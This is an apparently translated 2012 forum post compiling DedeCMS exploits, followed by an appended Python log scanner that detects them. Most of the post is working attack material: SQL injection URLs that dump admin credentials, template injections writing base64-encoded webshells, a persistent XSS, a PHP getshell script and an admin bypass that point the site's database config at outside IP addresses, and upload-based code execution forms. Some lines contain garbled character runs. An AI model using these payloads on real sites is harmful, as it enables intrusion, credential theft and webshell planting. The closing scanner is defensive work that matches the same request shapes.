DedeCMS vulnerability summary

[复制链接]
跳转到指定楼层
楼主
Posted on 2012-10-18 10:42:14

DedeCMS 5.6 RSS injection vulnerability (plus/rss.php)

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCMS v5.6 embedded malicious code execution vulnerability
Register as a member and upload a software item; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line webshell written directly.

DedeCMS 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions: gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it; this triggers the XSS and installs an XSS "rootkit". Note that IE8/9 block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; from then on, visiting either of the URLs below in any way triggers our XSS.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if ($argv[2] == null) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = $argv[3];
$exp  = Getshell($url, $aid, $path);
if (strpos($exp, "OK") > 12) {
    echo "\nExploit Success \n";
    if ($aid == 1) echo "\nShell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "\nShell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "\nShell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "\nExploit Failed \n";
}

function Getshell($url, $aid, $path) {
    $id   = $aid;
    $host = $url;
    $port = "80";
    // POST body: the doaction target plus the _COOKIE[GLOBALS][cfg_*] overrides
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    // raw HTTP request assembled by hand and written to a plain socket
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "\nNo response from ".$host."\n";
    }
    fwrite($ock, $data);
    // only the first line of the response is read and returned
    while (!feof($ock)) {
        $exp = fgets($ock, 1024);
        return $exp;
    }
}
?>

DedeCMS v5.6-5.7 privilege bypass vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you are taken straight into the site backend.

This vulnerability can only be exploited once the backend path is known.

DedeCMS (织梦) tag remote file write vulnerability
Precondition: you must have prepared your own dede database and inserted this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image; then in attachment management replace the image with our crafted template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(this is the crafted part)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
+ f8 W3 A/ A4 s, K<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article. Assuming the article just edited has aid 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS content management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>


2 |" |& {2 }$ E7 a6 J: q织梦(Dedecms)V5.6 远程文件删除漏洞6 y8 ~, c8 }$ b/ S# g1 E) s
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
& n% l3 r7 M$ J. B3 s# O6 S% a, g) X. `5 \6 U5 i( B

* Y2 Z' d7 T: o; w; M6 p) Z5 u8 H1 K8 Z( ?: F
+ ~; ~" {% L, L0 v( L( Y+ G+ G

& u( i5 Z- K: e8 j( q2 F
2 q6 D4 R; B* q: `
. i. a- d) r7 M& ]; }# i
6 `, g8 |9 a6 D. Y& D+ ?
  ?/ }, w6 O* _7 `" \: ?( j
DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability (addendum to the entry above, same query)
The password returned is the 32-character MD5 with the first 5 and the last 7 characters removed, leaving a 20-character MD5 string; then remove 3 more from the front and 1 from the end to get the 16-character MD5.

DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS (织梦) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS (织梦) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric overflow in a field value that raises an error, combined with DedeCMS writing database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing confirm, seeing the output from step 2 means the trojan file was uploaded successfully.

DedeCMS (织梦) plus/infosearch.php injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
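As an added defensive example (not part of the original post), the Python below scans web-server access-log lines for the request shapes that recur across the entries above: $_COOKIE/$_POST[GLOBALS][cfg_*] variable overrides (mytag_js.php, login.php), raw SQL in the sql= parameter of plus/advancedsearch.php, script markup in login.php's gotopage, traversal in edit_face.php and carbuyaction.php, DedeCMS template tags in parameters, and UNION SELECT / updatexml() injection strings (rss.php, feedback_js.php, infosearch.php). The log lines, client addresses and rule names are constructed for this example; the decoder also unwraps double percent-encoding, which the post's own payloads do not use.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Common Log Format); the request URIs
# mirror the payload shapes in the post above. Not taken from the original.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` HTTP/1.1" 200 512
10.0.0.6 - - [18/Oct/2012:10:43:01 +0800] "POST /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9 HTTP/1.1" 200 88
10.0.0.7 - - [18/Oct/2012:10:44:20 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3010
10.0.0.8 - - [18/Oct/2012:10:45:00 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 12
10.0.0.9 - - [18/Oct/2012:10:46:00 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4201
10.0.0.10 - - [18/Oct/2012:10:47:00 +0800] "POST /plus/mytag_js.php?aid=1&_COOKIE%255BGLOBALS%255D%255Bcfg_dbuser%255D=x HTTP/1.1" 200 88
"""

# Common Log Format: client address first, request line in double quotes.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*"')

# (rule name, regex run against the fully percent-decoded request URI)
RULES = [
    # $_COOKIE/$_POST[GLOBALS][cfg_*] overriding configuration values
    ("globals-override",
     re.compile(r"_(cookie|post|get|request)\[globals\]\[cfg_", re.I)),
    # raw SQL handed to plus/advancedsearch.php in the sql= parameter
    ("advancedsearch-raw-sql",
     re.compile(r"advancedsearch\.php\?.*\bsql=\s*select\b", re.I)),
    # script markup reflected through login.php's gotopage parameter
    ("gotopage-xss", re.compile(r"gotopage=[^&]*<script", re.I)),
    # dopost=delold with a traversal sequence (member/edit_face.php)
    ("edit_face-traversal-delete",
     re.compile(r"edit_face\.php\?.*dopost=delold.*\.\./", re.I)),
    # traversal in the code= parameter of plus/carbuyaction.php
    ("carbuyaction-lfi",
     re.compile(r"carbuyaction\.php\?.*code=[^&]*\.\./", re.I)),
    # DedeCMS template tags smuggled into a request parameter
    ("dede-tag-in-param", re.compile(r"\{/?dede:", re.I)),
    # UNION SELECT / updatexml() as in the rss, feedback_js, infosearch payloads
    ("sqli-function", re.compile(r"\b(union\s+select|updatexml\s*\()", re.I)),
]


def decode_uri(uri, rounds=3):
    """Percent-decode until a fixed point (bounded) so that double encoding
    cannot hide a payload from the rules."""
    prev = None
    for _ in range(rounds):
        if uri == prev:
            break
        prev, uri = uri, unquote_plus(uri)
    return uri


def match_rules(uri):
    """Return the names of all rules that fire on one request URI."""
    decoded = decode_uri(uri)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(text):
    """Map each client address to the set of rule names its requests hit."""
    hits = {}
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # not a CLF line: skip rather than guess
        names = match_rules(m.group("uri"))
        if names:
            hits.setdefault(m.group("ip"), set()).update(names)
    return hits


if __name__ == "__main__":
    for ip, names in sorted(scan_log(SAMPLE_LOG).items()):
        print(ip, sorted(names))
```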